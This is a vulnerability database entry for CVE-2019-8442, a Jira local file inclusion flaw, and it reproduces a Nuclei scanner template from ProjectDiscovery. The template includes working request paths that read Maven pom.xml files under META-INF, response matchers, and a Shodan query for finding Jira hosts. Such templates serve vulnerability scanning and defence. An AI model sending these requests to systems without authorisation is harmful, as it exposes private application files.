Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-8442
HistoryOct 02, 2020 - 7:50 p.m.

Jira - Local File Inclusion

2020-10-0219:50:52
ProjectDiscovery
github.com
4

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.971 High

EPSS

Percentile

99.8%

Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.

id: CVE-2019-8442

info:
  name: Jira - Local File Inclusion
  author: Kishore Krishna (siLLyDaddy)
  severity: high
  description: Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.
  impact: |
    This vulnerability can result in sensitive information exposure, unauthorized access to files, and potential compromise of the Jira application.
  remediation: |
    Apply the latest security patches or updates provided by Atlassian to mitigate the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69241
    - https://nvd.nist.gov/vuln/detail/CVE-2019-8442
    - https://github.com/0ps/pocassistdb
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-8442
    epss-score: 0.97131
    epss-percentile: 0.99777
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: atlassian
    product: jira
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,atlassian,jira,lfi,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
      - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <groupId>com.atlassian.jira</groupId>

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e2f32b43a1274af7f685f10486e3a05cabdc34c51a8f155bb01bd5dc1b2c085502201fb5b32334bdee1f088a1a80e3c119b4d8c02ea82efeca8bbe968cf9d59b4502:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.971 High

EPSS

Percentile

99.8%